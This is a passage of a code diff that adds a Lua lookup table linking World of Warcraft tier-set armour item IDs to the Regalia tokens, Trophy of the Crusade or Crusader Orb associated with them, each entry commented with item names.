Liadrin's Legplates of Triumph + 48621, -- Liadrin's Shoulderplates of Triumph + 48642, -- Turalyon's Breastplate of Triumph + 48643, -- Turalyon's Handguards of Triumph + 48644, -- Turalyon's Faceguard of Triumph + 48645, -- Turalyon's Legguards of Triumph + 48646, -- Turalyon's Shoulderguards of Triumph + 48647, -- Liadrin's Shoulderguards of Triumph + 48648, -- Liadrin's Legguards of Triumph + 48649, -- Liadrin's Faceguard of Triumph + 48650, -- Liadrin's Handguards of Triumph + 48651, -- Liadrin's Breastplate of Triumph + }, + -- Regalia of the Grand Protector + ["47558"] = { + 48260, -- Windrunner's Spaulders of Triumph + 48261, -- Windrunner's Legguards of Triumph + 48262, -- Windrunner's Headpiece of Triumph + 48263, -- Windrunner's Handguards of Triumph + 48264, -- Windrunner's Tunic of Triumph + 48265, -- Windrunner's Tunic of Triumph + 48266, -- Windrunner's Handguards of Triumph + 48267, -- Windrunner's Headpiece of Triumph + 48268, -- Windrunner's Legguards of Triumph + 48269, -- Windrunner's Spaulders of Triumph + 48290, -- Nobundo's Spaulders of Triumph + 48291, -- Nobundo's Legguards of Triumph + 48292, -- Nobundo's Headpiece of Triumph + 48293, -- Nobundo's Handguards of Triumph + 48294, -- Nobundo's Tunic of Triumph + 48305, -- Thrall's Tunic of Triumph + 48306, -- Thrall's Handguards of Triumph + 48307, -- Thrall's Headpiece of Triumph + 48308, -- Thrall's Legguards of Triumph + 48309, -- Thrall's Spaulders of Triumph + 48321, -- Nobundo's Shoulderpads of Triumph + 48322, -- Nobundo's Kilt of Triumph + 48323, -- Nobundo's Helm of Triumph + 48324, -- Nobundo's Gloves of Triumph + 48325, -- Nobundo's Hauberk of Triumph + 48326, -- Thrall's Hauberk of Triumph + 48327, -- Thrall's Gloves of Triumph + 48328, -- Thrall's Helm of Triumph + 48329, -- Thrall's Kilt of Triumph + 48330, -- Thrall's Shoulderpads of Triumph + 48351, -- Nobundo's Shoulderguards of Triumph + 48352, -- Nobundo's War-Kilt of Triumph + 48353, -- Nobundo's Faceguard of Triumph + 48354, -- Nobundo's Grips of Triumph + 48355, -- Nobundo's Chestguard of Triumph + 48356, -- Thrall's Chestguard of Triumph + 48357, -- Thrall's Grips of Triumph + 48358, -- Thrall's Faceguard of Triumph + 48359, -- Thrall's War-Kilt of Triumph + 48360, -- Thrall's Shoulderguards of Triumph + 48381, -- Wrynn's Shoulderplates of Triumph + 48382, -- Wrynn's Legplates of Triumph + 48383, -- Wrynn's Helmet of Triumph + 48384, -- Wrynn's Gauntlets of Triumph + 48385, -- Wrynn's Battleplate of Triumph + 48396, -- Hellscream's Battleplate of Triumph + 48397, -- Hellscream's Gauntlets of Triumph + 48398, -- Hellscream's Helmet of Triumph + 48399, -- Hellscream's Legplates of Triumph + 48400, -- Hellscream's Shoulderplates of Triumph + 48433, -- Wrynn's Greathelm of Triumph + 48447, -- Wrynn's Legguards of Triumph + 48451, -- Wrynn's Breastplate of Triumph + 48453, -- Wrynn's Handguards of Triumph + 48455, -- Wrynn's Pauldrons of Triumph + 48466, -- Hellscream's Breastplate of Triumph + 48467, -- Hellscream's Handguards of Triumph + 48468, -- Hellscream's Greathelm of Triumph + 48469, -- Hellscream's Legguards of Triumph + 48470, -- Hellscream's Pauldrons of Triumph + }, + -- Regalia of the Grand Vanquisher + ["47559"] = { + 47758, -- Khadgar's Shoulderpads of Triumph + 47759, -- Khadgar's Robe of Triumph + 47760, -- Khadgar's Leggings of Triumph + 47761, -- Khadgar's Hood of Triumph + 47762, -- Khadgar's Gauntlets of Triumph + 47763, -- Sunstrider's Gauntlets of Triumph + 47764, -- Sunstrider's Hood of Triumph + 47765, -- Sunstrider's Leggings of Triumph + 47766, -- Sunstrider's Robe of Triumph + 47767, -- Sunstrider's Shoulderpads of Triumph + 48138, -- Malfurion's Spaulders of Triumph + 48139, -- Malfurion's Robe of Triumph + 48140, -- Malfurion's Leggings of Triumph + 48141, -- Malfurion's Headpiece of Triumph + 48142, -- Malfurion's Handguards of Triumph + 48143, -- Runetotem's Handguards of Triumph + 48144, -- Runetotem's Headpiece of Triumph + 48145, -- Runetotem's Leggings of Triumph + 48146, -- Runetotem's Robe of Triumph + 48147, -- Runetotem's Spaulders of Triumph + 48168, -- Malfurion's Mantle of Triumph + 48169, -- Malfurion's Vestments of Triumph + 48170, -- Malfurion's Trousers of Triumph + 48171, -- Malfurion's Cover of Triumph + 48172, -- Malfurion's Gloves of Triumph + 48173, -- Runetotem's Gloves of Triumph + 48174, -- Runetotem's Cover of Triumph + 48175, -- Runetotem's Trousers of Triumph + 48176, -- Runetotem's Vestments of Triumph + 48177, -- Runetotem's Mantle of Triumph + 48198, -- Runetotem's Shoulderpads of Triumph + 48199, -- Runetotem's Raiments of Triumph + 48200, -- Runetotem's Legguards of Triumph + 48201, -- Runetotem's Headguard of Triumph + 48202, -- Runetotem's Handgrips of Triumph + 48203, -- Malfurion's Handgrips of Triumph + 48204, -- Malfurion's Headguard of Triumph + 48205, -- Malfurion's Legguards of Triumph + 48206, -- Malfurion's Raiments of Triumph + 48207, -- Malfurion's Shoulderpads of Triumph + 48228, -- VanCleef's Pauldrons of Triumph + 48229, -- VanCleef's Legplates of Triumph + 48230, -- VanCleef's Helmet of Triumph + 48231, -- VanCleef's Gauntlets of Triumph + 48232, -- VanCleef's Breastplate of Triumph + 48233, -- Garona's Breastplate of Triumph + 48234, -- Garona's Gauntlets of Triumph + 48235, -- Garona's Helmet of Triumph + 48236, -- Garona's Legplates of Triumph + 48237, -- Garona's Pauldrons of Triumph + 48486, -- Thassarian's Shoulderplates of Triumph + 48487, -- Thassarian's Legplates of Triumph + 48488, -- Thassarian's Helmet of Triumph + 48489, -- Thassarian's Gauntlets of Triumph + 48490, -- Thassarian's Battleplate of Triumph + 48491, -- Koltira's Battleplate of Triumph + 48492, -- Koltira's Gauntlets of Triumph + 48493, -- Koltira's Helmet of Triumph + 48494, -- Koltira's Legplates of Triumph + 48495, -- Koltira's Shoulderplates of Triumph + 48543, -- Thassarian's Pauldrons of Triumph + 48544, -- Thassarian's Legguards of Triumph + 48545, -- Thassarian's Faceguard of Triumph + 48546, -- Thassarian's Handguards of Triumph + 48547, -- Thassarian's Chestguard of Triumph + 48548, -- Koltira's Chestguard of Triumph + 48549, -- Koltira's Handguards of Triumph + 48550, -- Koltira's Faceguard of Triumph + 48551, -- Koltira's Legguards of Triumph + 48552, -- Koltira's Pauldrons of Triumph + }, + -- Saronite Swordbreakers + ["47570"] = { + 47556, -- Crusader Orb + }, + -- Saronite Swordbreakers + ["47571"] = { + 47556, -- Crusader Orb + }, + -- Titanium Spikeguards + ["47572"] = { + 47556, -- Crusader Orb + }, + -- Titanium Spikeguards + ["47573"] = { + 47556, -- Crusader Orb + }, + -- Sunforged Bracers + ["47574"] = { + 47556, -- Crusader Orb + }, + -- Sunforged Bracers + ["47575"] = { + 47556, -- Crusader Orb + }, + -- Crusader's Dragonscale Bracers + ["47576"] = { + 47556, -- Crusader Orb + }, + -- Crusader's Dragonscale Bracers + ["47577"] = { + 47556, -- Crusader Orb + }, + -- Black Chitin Bracers + ["47579"] = { + 47556, -- Crusader Orb + }, + -- Black Chitin Bracers + ["47580"] = { + 47556, -- Crusader Orb + }, + -- Bracers of Swift Death + ["47581"] = { + 47556, -- Crusader Orb + }, + -- Bracers of Swift Death + ["47582"] = { + 47556, -- Crusader Orb + }, + -- Moonshadow Armguards + ["47583"] = { + 47556, -- Crusader Orb + }, + -- Moonshadow Armguards + ["47584"] = { + 47556, -- Crusader Orb + }, + -- Bejeweled Wizard's Bracers + ["47585"] = { + 47556, -- Crusader Orb + }, + -- Bejeweled Wizard's Bracers + ["47586"] = { + 47556, -- Crusader Orb + }, + -- Royal Moonshroud Bracers + ["47587"] = { + 47556, -- Crusader Orb + }, + -- Royal Moonshroud Bracers + ["47588"] = { + 47556, -- Crusader Orb + }, + -- Titanium Razorplate + ["47589"] = { + 47556, -- Crusader Orb + }, + -- Titanium Razorplate + ["47590"] = { + 47556, -- Crusader Orb + }, + -- Breastplate of the White Knight + ["47591"] = { + 47556, -- Crusader Orb + }, + -- Breastplate of the White Knight + ["47592"] = { + 47556, -- Crusader Orb + }, + -- Sunforged Breastplate + ["47593"] = { + 47556, -- Crusader Orb + }, + -- Sunforged Breastplate + ["47594"] = { + 47556, -- Crusader Orb + }, + -- Crusader's Dragonscale Breastplate + ["47595"] = { + 47556, -- Crusader Orb + }, + -- Crusader's Dragonscale Breastplate + ["47596"] = { + 47556, -- Crusader Orb + }, + -- Ensorcelled Nerubian Breastplate + ["47597"] = { + 47556, -- Crusader Orb + }, + -- Ensorcelled Nerubian Breastplate + ["47598"] = { + 47556, -- Crusader Orb + }, + -- Knightbane Carapace + ["47599"] = { + 47556, -- Crusader Orb + }, + -- Knightbane Carapace + ["47600"] = { + 47556, -- Crusader Orb + }, + -- Lunar Eclipse Robes + ["47601"] = { + 47556, -- Crusader Orb + }, + -- Lunar Eclipse Robes + ["47602"] = { + 47556, -- Crusader Orb + }, + -- Merlin's Robe + ["47603"] = { + 47556, -- Crusader Orb + }, + -- Merlin's Robe + ["47604"] = { + 47556, -- Crusader Orb + }, + -- Royal Moonshroud Robe + ["47605"] = { + 47556, -- Crusader Orb + }, + -- Royal Moonshroud Robe + ["47606"] = { + 47556, -- Crusader Orb + }, + -- Khadgar's Gauntlets of Triumph + ["47753"] = { + 47242, -- Trophy of the Crusade + }, + -- Khadgar's Hood of Triumph + ["47754"] = { + 47242, -- Trophy of the Crusade + }, + -- Khadgar's Leggings of Triumph + ["47755"] = { + 47242, -- Trophy of the Crusade + }, + -- Khadgar's Robe of Triumph + ["47756"] = { + 47242, -- Trophy of the Crusade + }, + -- Khadgar's Shoulderpads of Triumph + ["47757"] = { + 47242, -- Trophy of the Crusade + }, + -- Khadgar's Shoulderpads of Triumph + ["47758"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Khadgar's Robe of Triumph + ["47759"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Khadgar's Leggings of Triumph + ["47760"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Khadgar's Hood of Triumph + ["47761"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Khadgar's Gauntlets of Triumph + ["47762"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Sunstrider's Gauntlets of Triumph + ["47763"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Sunstrider's Hood of Triumph + ["47764"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Sunstrider's Leggings of Triumph + ["47765"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Sunstrider's Robe of Triumph + ["47766"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Sunstrider's Shoulderpads of Triumph + ["47767"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Sunstrider's Shoulderpads of Triumph + ["47768"] = { + 47242, -- Trophy of the Crusade + }, + -- Sunstrider's Robe of Triumph + ["47769"] = { + 47242, -- Trophy of the Crusade + }, + -- Sunstrider's Leggings of Triumph + ["47770"] = { + 47242, -- Trophy of the Crusade + }, + -- Sunstrider's Hood of Triumph + ["47771"] = { + 47242, -- Trophy of the Crusade + }, + -- Sunstrider's Gauntlets of Triumph + ["47772"] = { + 47242, -- Trophy of the Crusade + }, + -- Kel'Thuzad's Hood of Triumph + ["47778"] = { + 47242, -- Trophy of the Crusade + }, + -- Kel'Thuzad's Robe of Triumph + ["47779"] = { + 47242, -- Trophy of the Crusade + }, + -- Kel'Thuzad's Leggings of Triumph + ["47780"] = { + 47242, -- Trophy of the Crusade + }, + -- Kel'Thuzad's Shoulderpads of Triumph + ["47781"] = { + 47242, -- Trophy of the Crusade + }, + -- Kel'Thuzad's Gloves of Triumph + ["47782"] = { + 47242, -- Trophy of the Crusade + }, + -- Kel'Thuzad's Gloves of Triumph + ["47788"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Kel'Thuzad's Hood of Triumph + ["47789"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Kel'Thuzad's Leggings of Triumph + ["47790"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Kel'Thuzad's Robe of Triumph + ["47791"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Kel'Thuzad's Shoulderpads of Triumph + ["47792"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Gul'dan's Shoulderpads of Triumph + ["47793"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Gul'dan's Robe of Triumph + ["47794"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Gul'dan's Leggings of Triumph + ["47795"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Gul'dan's Hood of Triumph + ["47796"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Gul'dan's Gloves of Triumph + ["47797"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Gul'dan's Gloves of Triumph + ["47803"] = { + 47242, -- Trophy of the Crusade + }, + -- Gul'dan's Hood of Triumph + ["47804"] = { + 47242, -- Trophy of the Crusade + }, + -- Gul'dan's Leggings of Triumph + ["47805"] = { + 47242, -- Trophy of the Crusade + }, + -- Gul'dan's Robe of Triumph + ["47806"] = { + 47242, -- Trophy of the Crusade + }, + -- Gul'dan's Shoulderpads of Triumph + ["47807"] = { + 47242, -- Trophy of the Crusade + }, + -- Velen's Gloves of Triumph + ["47983"] = { + 47242, -- Trophy of the Crusade + }, + -- Velen's Cowl of Triumph + ["47984"] = { + 47242, -- Trophy of the Crusade + }, + -- Velen's Leggings of Triumph + ["47985"] = { + 47242, -- Trophy of the Crusade + }, + -- Velen's Robe of Triumph + ["47986"] = { + 47242, -- Trophy of the Crusade + }, + -- Velen's Shoulderpads of Triumph + ["47987"] = { + 47242, -- Trophy of the Crusade + }, + -- Velen's Shoulderpads of Triumph + ["48029"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Velen's Robe of Triumph + ["48031"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Velen's Leggings of Triumph + ["48033"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Velen's Cowl of Triumph + ["48035"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Velen's Gloves of Triumph + ["48037"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Zabra's Gloves of Triumph + ["48057"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Zabra's Cowl of Triumph + ["48058"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Zabra's Leggings of Triumph + ["48059"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Zabra's Robe of Triumph + ["48060"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Zabra's Shoulderpads of Triumph + ["48061"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Zabra's Shoulderpads of Triumph + ["48062"] = { + 47242, -- Trophy of the Crusade + }, + -- Zabra's Robe of Triumph + ["48063"] = { + 47242, -- Trophy of the Crusade + }, + -- Zabra's Leggings of Triumph + ["48064"] = { + 47242, -- Trophy of the Crusade + }, + -- Zabra's Cowl of Triumph + ["48065"] = { + 47242, -- Trophy of the Crusade + }, + -- Zabra's Gloves of Triumph + ["48066"] = { + 47242, -- Trophy of the Crusade + }, + -- Velen's Handwraps of Triumph + ["48077"] = { + 47242, -- Trophy of the Crusade + }, + -- Velen's Circlet of Triumph + ["48078"] = { + 47242, -- Trophy of the Crusade + }, + -- Velen's Pants of Triumph + ["48079"] = { + 47242, -- Trophy of the Crusade + }, + -- Velen's Raiments of Triumph + ["48080"] = { + 47242, -- Trophy of the Crusade + }, + -- Velen's Mantle of Triumph + ["48081"] = { + 47242, -- Trophy of the Crusade + }, + -- Velen's Mantle of Triumph + ["48082"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Velen's Raiments of Triumph + ["48083"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Velen's Pants of Triumph + ["48084"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Velen's Circlet of Triumph + ["48085"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Velen's Handwraps of Triumph + ["48086"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Zabra's Handwraps of Triumph + ["48087"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Zabra's Circlet of Triumph + ["48088"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Zabra's Pants of Triumph + ["48089"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Zabra's Raiments of Triumph + ["48090"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Zabra's Mantle of Triumph + ["48091"] = { + 47557, -- Regalia of the Grand Conqueror + }, + -- Zabra's Mantle of Triumph + ["48092"] = { + 47242, -- Trophy of the Crusade + }, + -- Zabra's Raiments of Triumph + ["48093"] = { + 47242, -- Trophy of the Crusade + }, + -- Zabra's Pants of Triumph + ["48094"] = { + 47242, -- Trophy of the Crusade + }, + -- Zabra's Circlet of Triumph + ["48095"] = { + 47242, -- Trophy of the Crusade + }, + -- Zabra's Handwraps of Triumph + ["48096"] = { + 47242, -- Trophy of the Crusade + }, + -- Malfurion's Handguards of Triumph + ["48133"] = { + 47242, -- Trophy of the Crusade + }, + -- Malfurion's Headpiece of Triumph + ["48134"] = { + 47242, -- Trophy of the Crusade + }, + -- Malfurion's Leggings of Triumph + ["48135"] = { + 47242, -- Trophy of the Crusade + }, + -- Malfurion's Robe of Triumph + ["48136"] = { + 47242, -- Trophy of the Crusade + }, + -- Malfurion's Spaulders of Triumph + ["48137"] = { + 47242, -- Trophy of the Crusade + }, + -- Malfurion's Spaulders of Triumph + ["48138"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Malfurion's Robe of Triumph + ["48139"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Malfurion's Leggings of Triumph + ["48140"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Malfurion's Headpiece of Triumph + ["48141"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Malfurion's Handguards of Triumph + ["48142"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Runetotem's Handguards of Triumph + ["48143"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Runetotem's Headpiece of Triumph + ["48144"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Runetotem's Leggings of Triumph + ["48145"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Runetotem's Robe of Triumph + ["48146"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Runetotem's Spaulders of Triumph + ["48147"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Runetotem's Spaulders of Triumph + ["48148"] = { + 47242, -- Trophy of the Crusade + }, + -- Runetotem's Robe of Triumph + ["48149"] = { + 47242, -- Trophy of the Crusade + }, + -- Runetotem's Leggings of Triumph + ["48150"] = { + 47242, -- Trophy of the Crusade + }, + -- Runetotem's Headpiece of Triumph + ["48151"] = { + 47242, -- Trophy of the Crusade + }, + -- Runetotem's Handguards of Triumph + ["48152"] = { + 47242, -- Trophy of the Crusade + }, + -- Malfurion's Gloves of Triumph + ["48163"] = { + 47242, -- Trophy of the Crusade + }, + -- Malfurion's Cover of Triumph + ["48164"] = { + 47242, -- Trophy of the Crusade + }, + -- Malfurion's Trousers of Triumph + ["48165"] = { + 47242, -- Trophy of the Crusade + }, + -- Malfurion's Vestments of Triumph + ["48166"] = { + 47242, -- Trophy of the Crusade + }, + -- Malfurion's Mantle of Triumph + ["48167"] = { + 47242, -- Trophy of the Crusade + }, + -- Malfurion's Mantle of Triumph + ["48168"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Malfurion's Vestments of Triumph + ["48169"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Malfurion's Trousers of Triumph + ["48170"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Malfurion's Cover of Triumph + ["48171"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Malfurion's Gloves of Triumph + ["48172"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Runetotem's Gloves of Triumph + ["48173"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Runetotem's Cover of Triumph + ["48174"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Runetotem's Trousers of Triumph + ["48175"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Runetotem's Vestments of Triumph + ["48176"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Runetotem's Mantle of Triumph + ["48177"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Runetotem's Mantle of Triumph + ["48178"] = { + 47242, -- Trophy of the Crusade + }, + -- Runetotem's Vestments of Triumph + ["48179"] = { + 47242, -- Trophy of the Crusade + }, + -- Runetotem's Trousers of Triumph + ["48180"] = { + 47242, -- Trophy of the Crusade + }, + -- Runetotem's Cover of Triumph + ["48181"] = { + 47242, -- Trophy of the Crusade + }, + -- Runetotem's Gloves of Triumph + ["48182"] = { + 47242, -- Trophy of the Crusade + }, + -- Runetotem's Handgrips of Triumph + ["48193"] = { + 47242, -- Trophy of the Crusade + }, + -- Runetotem's Headguard of Triumph + ["48194"] = { + 47242, -- Trophy of the Crusade + }, + -- Runetotem's Legguards of Triumph + ["48195"] = { + 47242, -- Trophy of the Crusade + }, + -- Runetotem's Raiments of Triumph + ["48196"] = { + 47242, -- Trophy of the Crusade + }, + -- Runetotem's Shoulderpads of Triumph + ["48197"] = { + 47242, -- Trophy of the Crusade + }, + -- Runetotem's Shoulderpads of Triumph + ["48198"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Runetotem's Raiments of Triumph + ["48199"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Runetotem's Legguards of Triumph + ["48200"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Runetotem's Headguard of Triumph + ["48201"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Runetotem's Handgrips of Triumph + ["48202"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Malfurion's Handgrips of Triumph + ["48203"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Malfurion's Headguard of Triumph + ["48204"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Malfurion's Legguards of Triumph + ["48205"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Malfurion's Raiments of Triumph + ["48206"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Malfurion's Shoulderpads of Triumph + ["48207"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Malfurion's Shoulderpads of Triumph + ["48208"] = { + 47242, -- Trophy of the Crusade + }, + -- Malfurion's Raiments of Triumph + ["48209"] = { + 47242, -- Trophy of the Crusade + }, + -- Malfurion's Legguards of Triumph + ["48210"] = { + 47242, -- Trophy of the Crusade + }, + -- Malfurion's Headguard of Triumph + ["48211"] = { + 47242, -- Trophy of the Crusade + }, + -- Malfurion's Handgrips of Triumph + ["48212"] = { + 47242, -- Trophy of the Crusade + }, + -- VanCleef's Breastplate of Triumph + ["48223"] = { + 47242, -- Trophy of the Crusade + }, + -- VanCleef's Gauntlets of Triumph + ["48224"] = { + 47242, -- Trophy of the Crusade + }, + -- VanCleef's Helmet of Triumph + ["48225"] = { + 47242, -- Trophy of the Crusade + }, + -- VanCleef's Legplates of Triumph + ["48226"] = { + 47242, -- Trophy of the Crusade + }, + -- VanCleef's Pauldrons of Triumph + ["48227"] = { + 47242, -- Trophy of the Crusade + }, + -- VanCleef's Pauldrons of Triumph + ["48228"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- VanCleef's Legplates of Triumph + ["48229"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- VanCleef's Helmet of Triumph + ["48230"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- VanCleef's Gauntlets of Triumph + ["48231"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- VanCleef's Breastplate of Triumph + ["48232"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Garona's Breastplate of Triumph + ["48233"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Garona's Gauntlets of Triumph + ["48234"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Garona's Helmet of Triumph + ["48235"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Garona's Legplates of Triumph + ["48236"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Garona's Pauldrons of Triumph + ["48237"] = { + 47559, -- Regalia of the Grand Vanquisher + }, + -- Garona's Pauldrons of Triumph + ["48238"] = { + 47242, -- Trophy of the Crusade + }, + -- Garona's Legplates of Triumph + ["48239"] = { + 47242, -- Trophy of the Crusade + }, + -- Garona's Helmet of Triumph + ["48240"] = { + 47242, -- Trophy of the Crusade + }, + -- Garona's Gauntlets of Triumph + ["48241"] = { + 47242, -- Trophy of the Crusade + }, + -- Garona's Breastplate of Triumph + ["48242"] = { + 47242, -- Trophy of the Crusade + }, + -- Windrunner's Tunic of Triumph + ["48255"] = { + 47242, -- Trophy of the Crusade + }, + -- Windrunner's Handguards of Triumph + ["48256"] = { + 47242, -- Trophy of the Crusade + }, + -- Windrunner's Headpiece of Triumph + ["48257"] = { + 47242, -- Trophy of the Crusade + }, + -- Windrunner's Legguards of Triumph + ["48258"] = { + 47242, -- Trophy of the Crusade + }, + -- Windrunner's Spaulders of Triumph + ["48259"] = { + 47242, -- Trophy of the Crusade + }, + -- Windrunner's Spaulders of Triumph + ["48260"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Windrunner's Legguards of Triumph + ["48261"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Windrunner's Headpiece of Triumph + ["48262"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Windrunner's Handguards of Triumph + ["48263"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Windrunner's Tunic of Triumph + ["48264"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Windrunner's Tunic of Triumph + ["48265"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Windrunner's Handguards of Triumph + ["48266"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Windrunner's Headpiece of Triumph + ["48267"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Windrunner's Legguards of Triumph + ["48268"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Windrunner's Spaulders of Triumph + ["48269"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Windrunner's Spaulders of Triumph + ["48270"] = { + 47242, -- Trophy of the Crusade + }, + -- Windrunner's Legguards of Triumph + ["48271"] = { + 47242, -- Trophy of the Crusade + }, + -- Windrunner's Headpiece of Triumph + ["48272"] = { + 47242, -- Trophy of the Crusade + }, + -- Windrunner's Handguards of Triumph + ["48273"] = { + 47242, -- Trophy of the Crusade + }, + -- Windrunner's Tunic of Triumph + ["48274"] = { + 47242, -- Trophy of the Crusade + }, + -- Nobundo's Tunic of Triumph + ["48285"] = { + 47242, -- Trophy of the Crusade + }, + -- Nobundo's Handguards of Triumph + ["48286"] = { + 47242, -- Trophy of the Crusade + }, + -- Nobundo's Headpiece of Triumph + ["48287"] = { + 47242, -- Trophy of the Crusade + }, + -- Nobundo's Legguards of Triumph + ["48288"] = { + 47242, -- Trophy of the Crusade + }, + -- Nobundo's Spaulders of Triumph + ["48289"] = { + 47242, -- Trophy of the Crusade + }, + -- Nobundo's Spaulders of Triumph + ["48290"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Nobundo's Legguards of Triumph + ["48291"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Nobundo's Headpiece of Triumph + ["48292"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Nobundo's Handguards of Triumph + ["48293"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Nobundo's Tunic of Triumph + ["48294"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Thrall's Tunic of Triumph + ["48300"] = { + 47242, -- Trophy of the Crusade + }, + -- Thrall's Handguards of Triumph + ["48301"] = { + 47242, -- Trophy of the Crusade + }, + -- Thrall's Headpiece of Triumph + ["48302"] = { + 47242, -- Trophy of the Crusade + }, + -- Thrall's Legguards of Triumph + ["48303"] = { + 47242, -- Trophy of the Crusade + }, + -- Thrall's Spaulders of Triumph + ["48304"] = { + 47242, -- Trophy of the Crusade + }, + -- Thrall's Tunic of Triumph + ["48305"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Thrall's Handguards of Triumph + ["48306"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Thrall's Headpiece of Triumph + ["48307"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Thrall's Legguards of Triumph + ["48308"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Thrall's Spaulders of Triumph + ["48309"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Nobundo's Hauberk of Triumph + ["48316"] = { + 47242, -- Trophy of the Crusade + }, + -- Nobundo's Gloves of Triumph + ["48317"] = { + 47242, -- Trophy of the Crusade + }, + -- Nobundo's Helm of Triumph + ["48318"] = { + 47242, -- Trophy of the Crusade + }, + -- Nobundo's Kilt of Triumph + ["48319"] = { + 47242, -- Trophy of the Crusade + }, + -- Nobundo's Shoulderpads of Triumph + ["48320"] = { + 47242, -- Trophy of the Crusade + }, + -- Nobundo's Shoulderpads of Triumph + ["48321"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Nobundo's Kilt of Triumph + ["48322"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Nobundo's Helm of Triumph + ["48323"] = { + 47558, -- Regalia of the Grand Protector + }, + -- Nobundo's Gloves of Triumph + ["48324"] = { + 47558, -- Regalia of the Grand Protector + 